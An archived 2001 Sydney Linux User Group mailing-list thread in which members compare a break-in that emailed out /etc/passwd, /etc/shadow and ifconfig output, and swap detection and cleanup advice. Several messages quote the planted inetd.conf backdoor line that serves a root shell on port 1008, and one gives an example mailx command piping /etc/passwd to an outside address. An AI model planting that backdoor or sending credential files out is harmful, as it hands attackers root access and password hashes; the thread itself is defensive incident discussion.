RE: [SLUG] Security Breach

[Sean Carmody]

> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in teh process of getting in,
> they broke my local named (i wasnt working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.

My local named seemed ok. Contents of my email exactly as you describe.

> The ISP I was on was Telstra bigpond - if its the same, maybe they were
> scanning that range of addresses.

I was on ihug.

> The other change I found was the following entry on the end of
> /etc/inetd.conf:
> 1008 stream tcp nowait root /bin/sh sh
>
> which you may want to check for and remove/comment.

That's in mine too! Now commented.

> I am thinking it could have been the BIND exploit coming active, but not
> sure (I havent upgraded yet, and my listen-on clause was broken -
> now fixed not to listen outside).
>
> The fact taht they edited /etc/inetd.conf and cat-d shadow indicates root
> priveleges. However, there doesnt seem to be any evidence of things inside
> or other changes, so possibly a buffer of exploit type deal?
>
> I run RH6.2 btw :)

So do I.

> The only services i had running out of inetd were ftp, telnet and auth
> (first 2 are shut down until i get home to tighten things) - not portmap.
>
> Makes you wonder if one should send an edited email with prepared IP and
> ready a box to trace what happens :)

Was your email also addressed to [EMAIL PROTECTED]?


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Martin]

> I also tried to apply some "tight" ipchains rules but that
> seemed to stuff up pretty much everything so it's back out
> again for now until I work it out properly.

if you have problems getting ipchains rules right, have a look at
pmfirewall...

http://www.pointman.org

it is a script based ipchains ruleset that configures things according
to your answers to a series of questions during installation...

later
marty

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Dave Fitch]

On Wed, Feb 28, 2001 at 01:51:08PM +, Simon Bowden wrote:
> However, I think this is because somewhere in teh process of getting in,
> they broke my local named (i wasnt working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors".

funny you should say that, my named was also dead yesterday
when I got home from work.  I checked over everything, all
the logs, any binarys changed etc etc and couldn't find
anything else at all suspicious.  I was however accidentally
running named on all interfaces so I changed it to just
lo and eth0.  I was also running portmap but stopped it and
everything still seems to work so I guess I don't need it.
And I installed all the relevent security updates from the
debian security site.

I also tried to apply some "tight" ipchains rules but that
seemed to stuff up pretty much everything so it's back out
again for now until I work it out properly.

If I have tcp wrappers controlling everything listening on
all ports (except ssh, apache and postfix), it should be
reasonably secure without ipchains firewalling right?

Dave.

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Scott Howard]

On Wed, Feb 28, 2001 at 12:47:18PM +1100, Adrian Chiang wrote:
> Robert Graham's website has some info on port 1024:
> http://www.robertgraham.com/pubs/firewall-seen.html
> 
> quoted below -
> "1024 - Many people ask the question what this port is used for. The
> answer is that this is the first port number in the dynamic range of ports.

This is for outgoing connections, not for incoming, as is the case here.

lsof -i  will tell you which process is using a port.

  Scott.

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Howard Lowndes]

If it got the contents of /etc/shadow then they got root as that file is
normally only readable by root.  Big worry.

-- 
Howard.

LANNet Computing Associates 
"...well, it worked before _you_ touched it!"   --me
"I trust just one person,
 and there are times when I don't even trust myself"
--me

On Wed, 28 Feb 2001, Simon Bowden wrote:

> Hi,
>
> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in teh process of getting in,
> they broke my local named (i wasnt working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Simon Bowden]

Hi,

This occurred to me as well last night - I think around 3am. Similarly, it
was discovered because the mail destination domain could not be found.
However, I think this is because somewhere in teh process of getting in,
they broke my local named (i wasnt working in the morning) - that or
somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
errors". The email contained the output of ifconfig and the contents of
/etc/passwd and /etc/shadow.

The ISP I was on was Telstra bigpond - if its the same, maybe they were
scanning that range of addresses.

The other change I found was the following entry on the end of
/etc/inetd.conf:
1008 stream tcp nowait root /bin/sh sh

which you may want to check for and remove/comment.
 
I am thinking it could have been the BIND exploit coming active, but not
sure (I havent upgraded yet, and my listen-on clause was broken - now fixed
not to listen outside).

The fact taht they edited /etc/inetd.conf and cat-d shadow indicates root
priveleges. However, there doesnt seem to be any evidence of things inside
or other changes, so possibly a buffer of exploit type deal?

I run RH6.2 btw :)
The only services i had running out of inetd were ftp, telnet and auth
(first 2 are shut down until i get home to tighten things) - not portmap.

Makes you wonder if one should send an edited email with prepared IP and
ready a box to trace what happens :)

 - Simon

>Last night I experienced a security breach. I run a small lan with a
>ppp dial-up connection that is often left connected. It seems that at
>11pm an email containing the output of ifconfig and the contents of
>the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
>was bounced by our ISP (thanks to the lan's domain name not being found
>by the ISP's DNS).
>Scouring the log files, the only evidence of this breach I can file
>is the log of the attempted mail send in /var/log/maillog and the following
>suspicious entry in /var/log/messages:
>Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
>getport(status): request from unauthorized host
>This is the only portmap log I've ever had.
>Has anyone come across something similar? I've no idea whether this is
>the result of a trojan, or whether someone managed to gain access to
>my machine (although if they did gain root access, why mail out a passwd
>file?). Any thoughts?Sean.

--
Simon Bowden
Tech Support, School of Economics, UNSW
3rd Year Computer Engineering Student, UNSW
Mobile: 0414 937 375
email: [EMAIL PROTECTED]

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[kevin]

Adrian Chiang wrote:
> 
> Robert Graham's website has some info on port 1024:
> http://www.robertgraham.com/pubs/firewall-seen.html
> 
> quoted below -
> "1024 - Many people ask the question what this port is used for. The
> answer is that this is the first port number in the dynamic range of ports.
> Many applications don't care what port they use for a network connection, so
> they ask the operating system to assign the "next freely available port". In
> point of fact, they as for port 0, but are assigned one starting with port
> 1024. This means the first application on your system that requests a
> dynamic port will be assigned port 1024. You can test this fact by booting
> your computer, then in one window open a Telnet session, and in another
> window run "netstat -a". You will see that the Telnet application has been
> assigned port 1024 for its end of the connection. As more applications
> request more and more dynamic ports, the operating system will assign
> increasingly higher port numbers. Again, you can watch this effect with
> 'netstat' as your browse the Internet with your web browser, as each
> web-page requires a new connection. "
> 
> not sure about 587...
> 
587 is submission and is used by sendmail
I will assume you are using RedHat 7.0 as 
this is on by default, edit /etc/sendmail.cf
to turn it off if you wisyh
-- 
"[EMAIL PROTECTED] kevin"@oceania.net
"Democracy is two wolves and a lamb voting on what to have for lunch. 
Liberty is a well-armed lamb contesting the vote."
~Benjamin Franklin, 1759

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[John Clarke]

To find out which process is listening on a port, use fuser, e.g.:

[root@dropbear ~]# fuser -n tcp 53
53/tcp:  17479
[root@dropbear ~]# ps ax|grep 17479
17479  ?  S0:29 named -u named 


Cheers,

John
-- 
"Every time I have to pipe something into awk I get this mental picture of a 
big fat seagull with stdin connected at the wrong end."
-- Arthur van der Harg

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

RE: [SLUG] Security Breach

[Adrian Chiang]

Robert Graham's website has some info on port 1024:
http://www.robertgraham.com/pubs/firewall-seen.html

quoted below -
"1024 - Many people ask the question what this port is used for. The
answer is that this is the first port number in the dynamic range of ports.
Many applications don't care what port they use for a network connection, so
they ask the operating system to assign the "next freely available port". In
point of fact, they as for port 0, but are assigned one starting with port
1024. This means the first application on your system that requests a
dynamic port will be assigned port 1024. You can test this fact by booting
your computer, then in one window open a Telnet session, and in another
window run "netstat -a". You will see that the Telnet application has been
assigned port 1024 for its end of the connection. As more applications
request more and more dynamic ports, the operating system will assign
increasingly higher port numbers. Again, you can watch this effect with
'netstat' as your browse the Internet with your web browser, as each
web-page requires a new connection. "

not sure about 587...

Adrian.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Bernhard Lüder
Sent: Wednesday, 28 February 2001 12:29 PM
To:
Subject: RE: [SLUG] Security Breach


Hi,

In this context. What is port 587 and 1024. I couldn't find these in
/etc/services


tcp0  0 0.0.0.0:587 0.0.0.0:*   LISTEN
tcp0  0 0.0.0.0:10240.0.0.0:*   LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.




-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

RE: [SLUG] Security Breach

[Umar Goldeli]

"netstat -ean" will tell you which uid is listening on those ports.

//umar.


On Wed, 28 Feb 2001, [iso-8859-1] Bernhard Lüder wrote:

> Hi,
> 
> In this context. What is port 587 and 1024. I couldn't find these in
> /etc/services
> 
> 
> tcp0  0 0.0.0.0:587 0.0.0.0:*   LISTEN
> tcp0  0 0.0.0.0:10240.0.0.0:*   LISTEN


--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

RE: [SLUG] Security Breach

[Bernhard Lüder]

Hi,

In this context. What is port 587 and 1024. I couldn't find these in
/etc/services


tcp0  0 0.0.0.0:587 0.0.0.0:*   LISTEN
tcp0  0 0.0.0.0:10240.0.0.0:*   LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Umar Goldeli
Sent: Wednesday, February 28, 2001 11:37 AM
To: Sean Carmody
Cc: [EMAIL PROTECTED]
Subject: Re: [SLUG] Security Breach


> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you rnning the portmapper? Turn it off if youdon't specifically
need it.

a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p  or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or somehting like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.



--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug


--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

Re: [SLUG] Security Breach

[Umar Goldeli]

> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you rnning the portmapper? Turn it off if youdon't specifically
need it.

a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p  or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or somehting like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.



-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug

[SLUG] Security Breach

[Sean Carmody]

Last night I experienced a security breach. I run a small lan with a
ppp dial-up connection that is often left connected. It seems that at
11pm an email containing the output of ifconfig and the contents of
the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
was bounced by our ISP (thanks to the lan's domain name not being found
by the ISP's DNS).

Scouring the log files, the only evidence of this breach I can file
is the log of the attempted mail send in /var/log/maillog and the following
suspicious entry in /var/log/messages:

Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
getport(status): request from unauthorized host

This is the only portmap log I've ever had.

Has anyone come across something similar? I've no idea whether this is
the result of a trojan, or whether someone managed to gain access to
my machine (although if they did gain root access, why mail out a passwd
file?). Any thoughts?

Sean.


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug